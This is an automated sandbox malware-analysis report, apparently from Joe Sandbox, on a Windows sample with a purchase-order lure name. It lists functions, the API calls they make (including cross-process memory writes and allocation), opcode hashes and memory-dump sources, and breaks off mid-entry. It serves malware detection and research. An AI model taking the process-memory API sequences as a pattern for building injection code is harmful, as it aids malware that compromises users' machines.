                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                              • String ID:
                                                                                                              • API String ID: 3897988419-0
                                                                                                              • Opcode ID: a205420c72f7dfb33ca07129a002d52056e29927d6c83fe6036500350673f708
                                                                                                              • Instruction ID: 03e287a5ec78a91ed23f03fa94e8d314087521373a00f985898a82c2fc4b6b40
                                                                                                              • Opcode Fuzzy Hash: a205420c72f7dfb33ca07129a002d52056e29927d6c83fe6036500350673f708
                                                                                                              • Instruction Fuzzy Hash: 93017C76B00205ABDB105F54EC58A9A7BEDEB48391F144035F905D2210E7B4ED809BA5
                                                                                                              Function 0041AA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0041AA79
                                                                                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0041AA83
                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0041AA92
                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0041AA99
                                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0041AAAF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 44706859-0
                                                                                                              • Opcode ID: 80851c9f69c9d5ad4b0c7c08942f2f2121ca78fa2df3039bee9379a1c228660b
                                                                                                              • Instruction ID: 4abd401844dc5f5b32405f7aa9716bdf088bd7888b30aabc41f1ff00975613a8
                                                                                                              • Opcode Fuzzy Hash: 80851c9f69c9d5ad4b0c7c08942f2f2121ca78fa2df3039bee9379a1c228660b
                                                                                                              • Instruction Fuzzy Hash: BEF044717012046FD7115FA59C89EB73B6CFF4A754F00042AF941C7250E6A59C55CA6A
                                                                                                              Function 0041AAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0041AADA
                                                                                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0041AAE4
                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0041AAF3
                                                                                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0041AAFA
                                                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0041AB10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 44706859-0
                                                                                                              • Opcode ID: 7ede8eb2e020f0cad925534e3c860a6211e1fd7be741012e9f96273a738e2266
                                                                                                              • Instruction ID: 5e449d38c4e527afe4263606f8950d667af57fe8b2f3f8f15066ab18deb32ff2
                                                                                                              • Opcode Fuzzy Hash: 7ede8eb2e020f0cad925534e3c860a6211e1fd7be741012e9f96273a738e2266
                                                                                                              • Instruction Fuzzy Hash: 9DF044717052446FDB111FA5EC88EA73B6DFF4A754F00003AFA41C7250D7A5AC558A66
                                                                                                              Function 0041EC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 0041EC94
                                                                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041ECAB
                                                                                                              • MessageBeep.USER32(00000000), ref: 0041ECC3
                                                                                                              • KillTimer.USER32(?,0000040A), ref: 0041ECDF
                                                                                                              • EndDialog.USER32(?,00000001), ref: 0041ECF9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 3741023627-0
                                                                                                              • Opcode ID: 19d4c82884588776d24728f27ceebb42f865547b3e9803d6b4d3b077ad436511
                                                                                                              • Instruction ID: 61961fc8cab5d656090f99bed623bcff0938e459669e3d625af0869e4dd1b739
                                                                                                              • Opcode Fuzzy Hash: 19d4c82884588776d24728f27ceebb42f865547b3e9803d6b4d3b077ad436511
                                                                                                              • Instruction Fuzzy Hash: 28016234E00715ABEB255B12DE4EBD67778BB10705F00056AE943624E0FBF4A9848B8A
                                                                                                              Function 003FB0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • EndPath.GDI32(?), ref: 003FB0BA
                                                                                                              • StrokeAndFillPath.GDI32(?,?,0045E680,00000000,?,?,?), ref: 003FB0D6
                                                                                                              • SelectObject.GDI32(?,00000000), ref: 003FB0E9
                                                                                                              • DeleteObject.GDI32 ref: 003FB0FC
                                                                                                              • StrokePath.GDI32(?), ref: 003FB117
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                              • String ID:
                                                                                                              • API String ID: 2625713937-0
                                                                                                              • Opcode ID: ee7176060dba981dc77ce1911aa1ce8e6fecf76b4f1d5ea9bcee5e7acba11cfa
                                                                                                              • Instruction ID: b623d0799e273dd39fdba49dfa3d3cdaeb4f56bdfda32d832c9e004f6ba0dba9
                                                                                                              • Opcode Fuzzy Hash: ee7176060dba981dc77ce1911aa1ce8e6fecf76b4f1d5ea9bcee5e7acba11cfa
                                                                                                              • Instruction Fuzzy Hash: DAF04F74500608EFCB229F65EC0C7A83F64A7123A6F088335F525840F0DB708966CF19
                                                                                                              Function 0042F23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CoInitialize.OLE32(00000000), ref: 0042F2DA
                                                                                                              • CoCreateInstance.OLE32(0046DA7C,00000000,00000001,0046D8EC,?), ref: 0042F2F2
                                                                                                              • CoUninitialize.OLE32 ref: 0042F555
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateInitializeInstanceUninitialize
                                                                                                              • String ID: .lnk
                                                                                                              • API String ID: 948891078-24824748
                                                                                                              • Opcode ID: 888e1163181715a164d29ea5c178992bff970b88ad55d2a22c2d9f6bec221615
                                                                                                              • Instruction ID: c352bfffa4a30c5e6827837f1b14cc8ad54894080d584e89ac6da3dde9ec205f
                                                                                                              • Opcode Fuzzy Hash: 888e1163181715a164d29ea5c178992bff970b88ad55d2a22c2d9f6bec221615
                                                                                                              • Instruction Fuzzy Hash: 58A13D71604205AFD301EF64C881EAFB7ECEF98714F404A2DF5559B192EBB0EA49CB52
                                                                                                              Function 0042E7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 003E660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003E53B1,?,?,003E61FF,?,00000000,00000001,00000000), ref: 003E662F
                                                                                                              • CoInitialize.OLE32(00000000), ref: 0042E85D
                                                                                                              • CoCreateInstance.OLE32(0046DA7C,00000000,00000001,0046D8EC,?), ref: 0042E876
                                                                                                              • CoUninitialize.OLE32 ref: 0042E893
                                                                                                                • Part of subcall function 003E936C: __swprintf.LIBCMT ref: 003E93AB
                                                                                                                • Part of subcall function 003E936C: __itow.LIBCMT ref: 003E93DF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                              • String ID: .lnk
                                                                                                              • API String ID: 2126378814-24824748
                                                                                                              • Opcode ID: 3ad82830a021835b8f988bc07a228053e253193b7a1bc6bc69cf01bcc4f33cb5
                                                                                                              • Instruction ID: f8afe9f7cd7fda37961bd7ce269b59fea1344992144c07011bf5dfb3ac97f419
                                                                                                              • Opcode Fuzzy Hash: 3ad82830a021835b8f988bc07a228053e253193b7a1bc6bc69cf01bcc4f33cb5
                                                                                                              • Instruction Fuzzy Hash: 36A165756043219FCB10EF15C484A2EBBE5BF88310F148A5AF9969B3A2CB35EC45CB95
                                                                                                              Function 0040325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __startOneArgErrorHandling.LIBCMT ref: 004032ED
                                                                                                                • Part of subcall function 0040E0D0: __87except.LIBCMT ref: 0040E10B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorHandling__87except__start
                                                                                                              • String ID: pow
                                                                                                              • API String ID: 2905807303-2276729525
                                                                                                              • Opcode ID: b15c826dd7cfc29fc9a49586aef0e662782d8765c0175a921ffad6f75cfed260
                                                                                                              • Instruction ID: 1434e947ae8ee2ce4509a02eb0f465a349535b6b3e9387f6a93a419d0ad6be9b
                                                                                                              • Opcode Fuzzy Hash: b15c826dd7cfc29fc9a49586aef0e662782d8765c0175a921ffad6f75cfed260
                                                                                                              • Instruction Fuzzy Hash: D7515571A0820196CB15BB16C94137B2F989B40711F248DBFE8C5A63E9DE7C8AE4964E
                                                                                                              Function 00424606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0047DC50,?,0000000F,0000000C,00000016,0047DC50,?), ref: 00424645
                                                                                                                • Part of subcall function 003E936C: __swprintf.LIBCMT ref: 003E93AB
                                                                                                                • Part of subcall function 003E936C: __itow.LIBCMT ref: 003E93DF
                                                                                                              • CharUpperBuffW.USER32(?,?,00000000,?), ref: 004246C5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: BuffCharUpper$__itow__swprintf
                                                                                                              • String ID: REMOVE$THIS
                                                                                                              • API String ID: 3797816924-776492005
                                                                                                              • Opcode ID: 497dd3d0aa1ffac21a1dec135597d8897ce7d1378edf96cb6127dd0b5a30f71f
                                                                                                              • Instruction ID: a16632e69f1fcafd3a74a1f566753599876c462ec807146710935cc58e54ec16
                                                                                                              • Opcode Fuzzy Hash: 497dd3d0aa1ffac21a1dec135597d8897ce7d1378edf96cb6127dd0b5a30f71f
                                                                                                              • Instruction Fuzzy Hash: A441D634B002699FCF01EF55D881AAEB7B4FF85304F14806AE916AB392DB38DD41CB45
                                                                                                              Function 0041C189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0042430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0041BC08,?,?,00000034,00000800,?,00000034), ref: 00424335
                                                                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0041C1D3
                                                                                                                • Part of subcall function 004242D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0041BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00424300
                                                                                                                • Part of subcall function 0042422F: GetWindowThreadProcessId.USER32(?,?), ref: 0042425A
                                                                                                                • Part of subcall function 0042422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0041BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0042426A
                                                                                                                • Part of subcall function 0042422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0041BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00424280
                                                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0041C240
                                                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0041C28D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                              • String ID: @
                                                                                                              • API String ID: 4150878124-2766056989
                                                                                                              • Opcode ID: 84775c3033b787384d3ec5aabba2dd47bfebcb5bbe3e0b88969372f90fac2563
                                                                                                              • Instruction ID: f13b367bc4d8b1b489460320fd057535b00a0dac600890a9cc3a6f10d77b7ea7
                                                                                                              • Opcode Fuzzy Hash: 84775c3033b787384d3ec5aabba2dd47bfebcb5bbe3e0b88969372f90fac2563
                                                                                                              • Instruction Fuzzy Hash: E3415C76E00228AFDB11DFA5CC81AEEB778EF49700F00409AFA45B7180DB756E85CB65
                                                                                                              Function 0044A63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0047DC00,00000000,?,?,?,?), ref: 0044A6D8
                                                                                                              • GetWindowLongW.USER32 ref: 0044A6F5
                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0044A705
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$Long
                                                                                                              • String ID: SysTreeView32
                                                                                                              • API String ID: 847901565-1698111956
                                                                                                              • Opcode ID: 76f0037d63253d19270ccedeea79b0598e8994afe26a1ccbeca85865cd9bc668
                                                                                                              • Instruction ID: 7b30a83e2f9160488f52259041ea40167f036596ed301490889490f73e0f1ce2
                                                                                                              • Opcode Fuzzy Hash: 76f0037d63253d19270ccedeea79b0598e8994afe26a1ccbeca85865cd9bc668
                                                                                                              • Instruction Fuzzy Hash: 1031E031640205AFEB218E38CC41BEB77A9FB49324F254326F975922E0D774E8618B59
                                                                                                              Function 00435180 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 00435190
                                                                                                              • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 004351C6
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CrackInternet_memset
                                                                                                              • String ID: |$DC
                                                                                                              • API String ID: 1413715105-1934285739
                                                                                                              • Opcode ID: 69b68b61c93985aca078b68b05de0e204a7c16836c695d9e4ea9fa486babbf7a
                                                                                                              • Instruction ID: 8e1f3d5e34932c8376755f70fdad317680789e3687189da12ca07ea4fc58a860
                                                                                                              • Opcode Fuzzy Hash: 69b68b61c93985aca078b68b05de0e204a7c16836c695d9e4ea9fa486babbf7a
                                                                                                              • Instruction Fuzzy Hash: E1315D71C00119ABCF01EFA5CC45EEE7FB9FF18700F00015AF905AA1A6DB35A906DB64
                                                                                                              Function 0044A0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0044A15E
                                                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0044A172
                                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 0044A196
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Window
                                                                                                              • String ID: SysMonthCal32
                                                                                                              • API String ID: 2326795674-1439706946
                                                                                                              • Opcode ID: 6e06a0b9543719d377a29f33c606d5544d40275c883691109c1591b6fee8ff9a
                                                                                                              • Instruction ID: 53d487164fda7ed44d84529a999e35a1f8bb5b1a5c76320f3415048a8b58b5c7
                                                                                                              • Opcode Fuzzy Hash: 6e06a0b9543719d377a29f33c606d5544d40275c883691109c1591b6fee8ff9a
                                                                                                              • Instruction Fuzzy Hash: 7921A132650218ABEF118F94CC42FEA3B79FF48754F110215FA55AB1D0D6B9AC51CB94
                                                                                                              Function 0044A88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0044A941
                                                                                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0044A94F
                                                                                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0044A956
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$DestroyWindow
                                                                                                              • String ID: msctls_updown32
                                                                                                              • API String ID: 4014797782-2298589950
                                                                                                              • Opcode ID: c59a80260e3dd332cc4c02df26d5e3f00a1025697a4b652a5dfbd89dc4270b53
                                                                                                              • Instruction ID: e9f444ccac4a83f3dd9a71e9e04a9e9657494272eab5f706899a29e32722b4f5
                                                                                                              • Opcode Fuzzy Hash: c59a80260e3dd332cc4c02df26d5e3f00a1025697a4b652a5dfbd89dc4270b53
                                                                                                              • Instruction Fuzzy Hash: D12190B5600209AFEB11DF19CC81D773BADEB5A3A8F05045AFA049B3A1CB74EC11CB65
                                                                                                              Function 004499A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00449A30
                                                                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00449A40
                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00449A65
                                                                                                              Strings
